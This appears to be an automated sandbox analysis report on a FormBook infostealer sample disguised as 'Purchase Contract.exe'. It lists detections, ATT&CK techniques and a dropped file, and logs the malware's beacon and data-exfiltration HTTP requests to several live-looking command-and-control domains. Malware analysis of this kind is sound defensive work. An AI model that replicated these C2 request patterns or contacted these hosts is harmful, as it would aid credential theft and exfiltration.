Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Contract.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:225799
Start date:28.04.2020
Start time:03:13:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 15m 39s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Purchase Contract.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@14/10@28/7
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 37.9% (good quality ratio 34.2%)
  • Quality average: 74.1%
  • Quality standard deviation: 30.8%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 62
  • Number of non-executed functions: 340
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 205.185.216.10, 205.185.216.42, 104.18.136.62, 104.18.133.62, 104.18.135.62, 104.18.132.62, 104.18.134.62
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, format.com.cdn.cloudflare.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Software Packing2Credential Dumping1Security Software Discovery131Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution1Port MonitorsAccessibility FeaturesDisabling Security Tools1Input Capture1File and Directory Discovery2Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery12Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesVirtualization/Sandbox Evasion3Logon ScriptsInput Capture1Data EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion3Brute ForceRemote System Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: www.porcber.comVirustotal: Detection: 6%Perma Link
Source: http://www.porcber.comVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exeVirustotal: Detection: 32%Perma Link
Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exeReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted fileShow sources
Source: Purchase Contract.exeVirustotal: Detection: 32%Perma Link
Source: Purchase Contract.exeReversingLabs: Detection: 45%
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Purchase Contract.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 15.2.updategtmlg.exe.49a0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.updategtmlg.exe.57c0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Purchase Contract.exe.5370000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=jbVBrWG8kPPy1CntJKnIS/p3pTRMEOwQ7pcd0/8muHz8lgjxNZOf5/N47Cv4WKIkQI5C HTTP/1.1Host: www.bookwormegy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?Kxlpd=usiFhkEA2/xQfSWIf5NGRhfLT8+t9rWHJvPEvA/+NM3yMCY4ViL3D3aLSorWeJjb+qc5&tpeDP4=aN6tXx HTTP/1.1Host: www.bridgejfc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?Kxlpd=YpYaXTMBQs0E5vLJ/Yd9Yn8LoZOIuIOD62g1IdciXa5/abOgLLAXWzIHQlYdUNrQ6hv1&tpeDP4=aN6tXx HTTP/1.1Host: www.3dlasermaroc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=2djJOWHHKK7eyXP0GpI/PgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tCFLL5Q3Er2 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=bMzkr1fzZV+5QtXNWK4LXWvgw9C8VqyMR5lohTVdFC9G3pcizxH8g+YNb0t5pLB/ZO8J HTTP/1.1Host: www.yyw518.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /mq3/?Kxlpd=G5Xu6NHE4SkrvqPWXnU3UeXHC3kT8kLmWInNSoQ44xAbeTfsQH//0ntHgBoI/3bOih10&tpeDP4=aN6tXx HTTP/1.1Host: www.vamojunto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 35.242.251.130 35.242.251.130
Source: Joe Sandbox ViewIP Address: 94.136.40.82 94.136.40.82
Source: Joe Sandbox ViewIP Address: 23.20.239.12 23.20.239.12
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.bridgejfc.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.bridgejfc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bridgejfc.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 6d 4f 75 5f 28 41 35 4c 69 6f 59 44 41 52 47 4b 43 5f 38 51 4c 6b 76 50 63 65 69 76 71 4c 79 44 59 59 28 47 28 77 54 6c 4e 66 69 77 43 51 42 68 5a 33 7e 48 52 69 37 38 41 59 6d 73 5a 5a 76 44 76 76 67 39 6d 47 63 45 4f 77 28 6c 45 48 4c 52 6d 51 76 6e 4f 53 4c 4a 32 34 75 31 6b 4d 51 64 6f 62 70 6d 76 72 6d 4d 6e 62 53 74 67 6d 5a 50 59 66 75 64 68 38 30 4a 4d 51 4a 51 64 68 37 4e 75 7a 31 6e 4f 33 79 78 28 4f 4a 78 32 32 4d 79 6b 39 4f 4e 76 53 58 56 41 48 6c 77 6c 2d 41 42 69 58 31 59 36 59 30 39 6b 78 46 44 58 72 73 75 4a 76 4c 76 39 38 43 33 47 78 68 58 6e 67 6f 73 73 42 4f 30 64 5f 66 59 57 33 42 49 75 39 47 46 71 48 37 57 6a 44 62 50 5a 7a 77 50 67 46 41 46 4b 36 31 55 6a 63 5a 58 49 77 62 6f 69 48 71 2d 63 54 28 36 65 66 37 6c 46 49 4f 49 51 44 57 76 31 62 62 54 54 4e 78 58 71 5a 47 35 52 6b 7e 34 4a 54 71 67 6a 44 68 35 42 66 71 59 33 6f 41 33 38 76 75 38 36 55 45 42 66 71 4c 4f 31 4a 74 75 72 50 32 56 38 78 51 78 38 63 6c 44 36 72 4d 52 66 4d 63 41 62 47 73 62 4f 44 56 45 59 73 30 46 42 57 57 74 73 6d 55 77 51 72 51 42 44 69 4f 53 74 47 65 6a 36 48 6e 75 44 57 46 4a 75 34 48 74 63 61 75 34 78 63 65 71 7a 46 4c 34 4a 30 30 70 79 50 50 67 69 65 67 54 7e 62 57 36 4d 63 36 48 45 34 71 51 32 6f 39 33 62 5f 66 37 6b 73 4e 79 36 75 68 69 30 49 42 46 34 45 47 6f 6e 32 66 4d 56 7a 6f 46 68 4d 72 78 41 69 64 44 64 6f 54 6a 31 45 43 4e 47 36 71 35 28 30 67 33 33 34 63 2d 6e 4a 35 51 33 57 58 39 4f 53 33 79 73 67 4d 72 53 53 73 57 39 6c 62 68 61 56 41 48 6c 54 62 4f 37 4d 74 53 31 63 67 51 47 76 54 64 77 53 69 50 6a 46 77 61 4c 65 6d 55 53 72 52 50 66 58 52 63 72 74 4a 4b 65 74 68 62 78 39 4d 4c 76 36 67 34 74 31 5a 63 72 58 4b 6d 41 64 70 48 33 6f 51 59 38 5f 79 56 70 5f 32 47 67 2d 56 33 42 30 42 74 39 52 73 45 78 54 36 42 54 49 6f 63 6e 64 68 6c 68 72 7a 79 73 41 75 48 75 76 48 75 6b 57 68 6e 52 48 58 68 78 32 4a 74 41 6f 74 73 50 61 79 49 41 67 38 6b 52 33 69 51 78 6e 6a 47 57 58 35 41 33 5a 79 31 36 75 35 4a 47 7a 58 76 78 59 6f 41 32 4c 46 64 74 56 49 30 7a 59 74 7a 65 6d 68 6c 48 75 30 77 32 35 52 76 74 72 55 76 66 37 68 56 51 74 72 68 72 53 71 30 77 41 6c 31 63 56 30 4c 71 36 72 54 6e 70 43 66 52 50 4f 64 6d 44 78 52 31 75 4d 6d 76 45 65 42 43 44 73 69 33 30 35 65 6c 68 49 59 54 75 77 31 52 71 30 4c 70 61 69 78 30 6f 43 4d 43 57 31 4d 77 55 34 78 71 6f 6d 30 4a 68 53 34 48 32 4d 32 71 62 59 6e 31 70 4a 52 46 49 67 61 79 68 50 33 4b 48 66 79 39 56 55 45 47 2d 6d 61 58 48 45 43 4f 41 62 46 78 4b 36 76 71 55 67 6e 75 38 56 41 33 53 54 2d 76 52 4e 78 41 38 30 68 55 7a 74 66 71 68 4c 44 5a 46 67 57 4d 4c 6f 75 47 5f 50 48 46 33 4c 6
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.axcyl.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.axcyl.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.axcyl.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 63 2d 73 43 57 37 32 6d 30 7a 79 4b 55 34 28 5a 52 49 5a 75 45 58 77 63 7e 68 30 6f 44 76 4a 48 4a 68 73 53 43 78 71 74 61 43 6e 34 28 54 67 6e 54 74 5a 47 6f 6d 33 70 51 6e 34 47 59 65 70 32 64 73 79 41 4f 41 28 69 59 45 4a 6c 76 37 56 72 6f 75 4c 42 31 71 6b 4b 30 53 72 43 6e 70 39 52 37 71 4b 34 62 56 76 6e 73 56 68 33 47 51 57 41 38 43 79 66 44 38 73 62 54 37 67 33 72 64 51 45 6c 52 6b 34 54 58 45 6a 4f 35 62 48 43 46 6f 54 69 52 41 6d 65 2d 30 63 45 78 36 75 7e 56 4f 4a 39 78 34 4d 52 6b 36 35 75 57 4a 45 74 58 50 53 6a 75 59 6e 28 75 51 59 4e 61 69 6a 4c 79 58 4a 79 64 41 30 63 52 52 49 33 76 58 45 44 52 5a 70 68 71 5a 78 4b 54 70 37 56 7a 67 58 73 6d 6c 4e 28 35 48 36 5a 39 37 47 64 5a 6b 6a 32 64 43 56 7a 65 66 44 39 33 48 71 72 35 70 56 4f 7a 57 42 53 32 53 34 79 4b 70 75 34 66 6d 49 28 30 56 63 55 6b 67 61 7a 54 35 4f 54 75 73 54 51 71 7e 6d 74 2d 5a 4b 4d 4f 4f 49 42 48 63 35 6b 45 69 33 68 59 56 54 4b 33 63 4f 39 59 64 34 48 62 34 6a 4f 79 4c 32 59 6a 41 7a 59 63 4e 50 32 50 7e 45 4d 66 38 77 50 58 7e 57 72 35 4e 6c 45 67 5a 36 4e 43 49 72 77 4e 74 50 64 4e 4c 56 66 76 7e 72 30 6d 56 4a 4f 42 69 71 56 68 72 6d 4e 64 5a 4d 38 2d 67 6c 74 6d 49 6c 32 4a 46 79 43 47 70 52 58 37 6b 6d 71 33 37 52 72 32 71 46 35 32 6c 4e 71 4d 56 36 76 79 66 46 61 35 6a 4d 42 48 61 7a 56 7a 34 34 44 30 53 75 79 37 61 69 51 67 44 53 4d 45 44 61 55 33 75 43 62 75 54 73 66 35 76 78 73 44 46 4f 6f 50 75 6b 4c 46 42 6e 43 6d 51 69 50 74 37 53 74 75 33 6e 33 30 4d 74 59 42 76 41 45 32 56 52 43 57 73 44 6d 30 73 42 57 75 4d 36 48 51 30 6a 44 77 74 51 58 30 57 4c 53 33 4a 7a 6b 31 4e 53 75 59 4f 6c 53 61 45 6e 75 77 6d 79 39 75 72 72 57 5a 32 4c 46 5a 77 6c 38 5a 54 73 71 55 53 37 45 37 4a 5f 53 54 52 6f 52 4c 56 48 38 68 69 56 57 6a 61 42 57 4c 6a 59 36 64 4b 6e 45 44 30 6e 30 6f 4c 5f 28 2d 58 55 63 53 34 46 52 75 38 34 4f 32 61 31 33 68 55 61 74 70 46 58 30 66 54 57 59 4a 78 5a 51 64 39 64 41 6d 32 6d 76 4c 4c 4a 63 44 69 77 76 57 65 4f 66 53 34 6c 78 34 46 67 7e 4d 42 46 28 66 66 4c 66 59 57 6e 54 67 66 69 37 79 77 58 63 33 78 4e 4b 59 48 42 37 51 52 73 33 6d 33 4f 62 5f 54 7a 42 66 73 36 50 38 35 64 49 4e 69 78 6d 42 61 56 6f 78 59 33 57 67 53 57 45 48 33 31 55 61 41 70 67 2d 7a 37 6b 2d 52 4c 6d 7a 7a 61 4a 34 72 45 69 2d 56 4b 75 5f 53 56 39 6f 61 30 66 51 38 46 36 7a 7a 6e 36 43 64 4e 58 71 42 58 35 6f 62 73 61 41 6e 4a 49 41 64 4d 4f 57 53 59 61 43 6a 68 62 31 41 58 6f 31 35 41 74 4c 7a 6d 7e 36 54 79 73 79 46 77 54 55 38 4b 7a 30 78 6d 66 38 67 31 51 74 57 6e 51 63 28 42 6e 77 72 6d 59 4a 76 75 4c 4f 77 4d 34 51 6b 62 30 48 6a 33 77 74 5a 6b 42 33 35 6
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.3dlasermaroc.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.3dlasermaroc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3dlasermaroc.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 51 4c 55 67 4a 31 42 4a 49 35 42 72 37 6f 58 49 36 73 64 6a 48 6e 41 71 68 4c 66 45 67 6f 47 38 75 78 4a 54 59 71 41 41 54 4c 70 6a 61 34 32 2d 4a 72 6c 51 5a 6b 56 56 4d 6b 6c 39 5a 63 50 48 37 52 69 36 59 4a 49 30 73 63 53 76 6f 39 72 54 54 62 6f 57 5a 4f 6f 30 31 73 65 66 79 79 61 52 4b 71 64 6a 6f 62 66 4e 4c 5f 4b 73 30 63 4a 43 75 73 31 50 75 69 48 52 6a 39 61 55 56 55 72 77 66 64 77 30 47 38 71 7a 56 39 77 34 77 41 5a 52 62 2d 68 77 36 56 4d 53 38 4e 73 74 6d 35 77 35 61 76 6b 76 32 72 6a 71 6e 4c 42 75 68 34 31 49 6f 5f 55 4b 77 41 69 62 43 36 58 74 68 77 51 6d 41 45 51 6a 59 56 38 30 33 53 72 48 4d 78 76 71 64 64 56 48 46 44 58 61 7a 39 49 55 39 38 44 71 67 4d 77 41 42 74 62 77 4f 4b 4e 32 59 61 47 72 4c 6f 38 39 56 4e 4f 37 56 4b 53 4d 55 2d 34 35 77 37 4a 36 6e 4b 54 64 44 35 61 32 31 56 45 72 4c 32 58 37 66 4b 54 47 4b 4c 79 35 44 5a 64 30 45 45 53 5a 74 63 76 37 50 4c 45 62 6e 47 4e 64 61 6f 41 36 63 65 62 5f 55 78 61 38 61 36 4e 78 49 69 35 62 59 37 7a 34 77 69 6b 66 78 52 52 53 68 4a 61 35 69 71 6d 35 32 4d 63 6f 74 56 5a 33 35 72 41 2d 49 75 53 4c 36 6e 53 48 34 33 48 58 79 34 31 33 28 36 4a 54 4d 39 42 44 41 4e 7a 5f 75 49 68 61 6b 38 57 64 32 47 75 4f 77 71 36 51 46 5a 75 53 6f 2d 30 42 55 6b 73 35 61 69 65 4d 7e 58 35 71 63 66 78 39 77 73 67 36 4b 2d 37 32 4f 57 4a 51 77 56 74 71 77 64 6c 6c 74 37 45 45 7e 6e 59 43 77 79 31 38 47 6c 65 51 74 34 65 36 33 5f 55 44 36 46 73 4a 41 59 49 45 30 50 6c 6e 67 32 66 54 6d 52 4b 44 50 68 52 35 72 57 50 34 36 6e 71 71 65 36 4f 6c 64 64 34 76 4f 4b 7a 62 6b 36 48 5a 52 33 6a 75 6d 32 28 37 72 53 77 62 4a 66 39 59 43 30 58 43 54 79 65 41 53 34 6f 55 7e 6c 35 32 37 49 46 35 61 57 5a 6d 6a 70 53 53 54 66 51 34 68 7a 32 54 75 30 53 6e 57 75 33 35 6b 48 7a 47 56 73 37 33 54 4d 50 6c 47 6b 76 4e 38 77 6c 67 49 79 53 77 68 4e 6a 63 33 4f 78 6b 4e 78 71 47 33 7a 47 62 51 6f 66 30 43 62 4e 61 41 49 59 65 52 7a 59 4c 71 79 6c 78 67 70 46 5f 4e 33 69 53 67 4b 37 34 61 6b 6e 4a 4d 32 58 46 43 44 35 68 50 71 59 5a 66 61 59 38 6d 64 54 48 73 62 6d 4d 6d 4f 59 63 36 5a 45 6e 53 72 59 78 32 6f 37 6f 37 76 42 68 69 34 30 62 63 31 34 4e 52 57 61 64 4b 2d 42 77 30 69 41 33 34 62 32 38 41 61 42 68 39 50 35 4c 44 4c 43 6a 49 33 4e 73 68 57 36 56 51 68 33 58 6a 48 78 65 6f 7a 73 68 37 70 57 73 74 42 52 6f 37 4f 52 4f 28 7a 46 41 69 43 4f 73 4b 39 78 55 4d 59 49 6d 47 34 59 36 52 79 61 6c 28 5a 45 31 7e 48 28 32 71 79 35 39 35 4c 55 49 6b 43 45 69 62 33 30 5a 67 35 55 76 34 45 78 61 6d 39 69 46 6f 74 46 2d 52 36 51 55 67 7a 37 39 37 55 63 77 35 78 6f 6a 55 37 42 36 38 56 54 76 46 55 4e 43 6
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 5f 46 2d 6f 6d 59 6b 44 6b 6e 67 6e 59 45 37 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 73 56 47 5
Source: global trafficHTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.yyw518.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.yyw518.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yyw518.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 54 75 28 65 31 51 7e 47 4a 77 7a 77 4b 65 54 30 52 4d 74 62 55 51 44 44 38 76 43 50 66 70 66 47 43 70 38 66 6c 67 56 46 4d 79 39 58 35 4e 59 55 35 67 57 77 6f 61 42 72 46 47 4d 4c 74 37 55 57 41 39 41 42 65 6b 6a 70 7e 48 5a 4f 36 6b 35 70 48 38 34 30 42 5a 68 44 68 42 76 31 63 32 67 42 79 65 71 66 55 7a 37 73 64 79 6d 41 71 53 53 69 43 4f 67 6b 54 63 63 4a 33 79 6e 35 51 56 64 64 4f 54 74 5f 46 6e 76 61 79 72 6c 4e 54 6e 34 63 71 76 57 38 52 4a 46 45 51 66 68 72 77 4a 63 41 67 33 31 45 54 66 49 43 7e 7a 6b 6b 33 79 56 41 43 5f 74 5a 30 64 6c 64 58 35 68 4a 6f 32 